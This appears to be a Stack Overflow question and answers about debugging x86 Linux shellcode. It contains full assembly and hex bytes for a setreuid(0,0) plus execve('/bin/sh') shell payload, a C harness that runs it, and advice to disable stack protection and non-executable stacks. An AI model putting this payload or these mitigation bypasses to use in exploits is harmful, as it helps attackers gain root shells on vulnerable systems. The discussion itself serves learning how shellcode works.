# How can I turn this into shellcode?

Tags: c, shell, assembly, segmentation-fault, shellcode

Aright I wrote an ASM file that spawns a shell.

However, the .text section becomes "READONLY", so I'm keeping everything in the .data section. When I compile it with NASM and ld, it works perfectly. Then, when I use the shellcode and run it in a C program, I seg fault.

ASM:

```
SECTION .data
        global _start
_start:
        xor eax, eax
        xor ebx, ebx
        xor ecx, ecx
        xor edx, edx
        mov al, 70d
        int 80h
        jmp jump
rev:
        pop ebx
        xor eax, eax
        mov BYTE [ebx+7], al
        mov DWORD [ebx+8], ebx
        mov DWORD [ebx+12], eax
        mov al, 11d
        lea ecx, [ebx+8]
        lea edx, [ebx+12]
        int 80h
jump:
        call rev
shell: db "/bin/sh011112222"
```

When I compile it with:

```
nasm -f elf32 -o temporary_file.o
ld -s -m elf_i386 -o shell temporary_file.o
```

Everything works perfectly. I can ./shell and a shell spawns. However, when i use:

objdump -D shell (objdump -d shell doesn't show the .data section)

And change that into \x?? format, I cannot exectute the shell.
Shellcode:

```
\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x46\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x30\x31\x31\x31\x31\x32\x32\x32\x32
```

And in the C file:

```
#include <stdio.h>
unsigned char * shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31...";

int main(){
        printf("[~] Shellcode length (bytes): %d\n", strlen(shellcode));
        ((void(*)(void))shellcode)();
        return 0;
}
```

Seg fault.

Here is the first few lines of the `strace` output of the NASM compiled file:

```
[root@Arch tut]# strace ./exec
execve("./exec", ["./exec"], [/* 25 vars */]) = 0
[ Process PID=30445 runs in 32 bit mode. ]
setreuid(0, 0)                          = 0
execve("/bin/sh", ["/bin/sh"], [/* 3 vars */]) = 0
[ Process PID=30445 runs in 64 bit mode. ]
```

Now, here is the `strace` output of the C compiled file with the shellcode:

```
[root@Arch tut]# strace ./shell
execve("./shell", ["./shell"], [/* 25 vars */]) = 0
brk(0)                                  = 0x238b000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
```

Comment: I will update OP with Strace Output :)

Comment: I think you're confusing your arguments to execve? You're keeping the address of /bin/sh in ebx and the address of that address in ecx?

Comment: Well, it still works. That's the confusing part. The ecx has to contain the address of the ebx, not the pointer itself.

Comment: ecx should contain the address of the string (that's what you pop into ebx in the beginning), ebx should contain ebx+8 and edx should contain  ebx+12 shouldn't it? What does [this](http://pastebin.com/1WMB7fHm) produce?

Comment: It paused. I ran strace and it did this:                                      
`execve("}\220\4\10", [0x6e69622f, 0x68732f, "/bin/sh"], [/* 3 vars */]) = -1 ENOENT (No such file or directory)`<br>repetitively. Over and over. Here is the "man 2 execve" Synopsis: `int execve(const char *filename, char *const argv[], char *const envp[]);`

Comment: let us [continue this discussion in chat](http://chat.stackoverflow.com/rooms/44924/discussion-between-cckep-and-goodies)

Answer (score 4, accepted):

In your c program, replace:

```
unsigned char * shellcode = "\x31\xc0\x31\xdb\x31\xc9\x31...";
```

with

```
unsigned char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31...";
```

Otherwise gcc will put it in a readonly section (compile with -S to produce asm and take a look at the section)

Furthermore, you might need to compile it with `-fno-stack-protector -z execstack` to avoid stack protection.

Answer (score 0):

It is not possible to do something like this.

The first problem: If you compile the C program as 64 bit program you cannot mix it with 32 bit code. I assume you did that.

And the second one: Even if you compile the C program as 32 bit program (you'll have to install the 32 bit shared libraries so you can run it) you cannot run the program. This is because the memory management of Linux will prohibit execution of code in a data section by setting the NX bit of the MMU.

This means: Trying to execute code in a string (as you do) will cause a segmentation fault!

Comment: Hmm... When I erase essentially the entire "rev" section and replace it with exit system calls, it runs fine when compiled, changed to shellcode, put in the C file, compiled, and executed.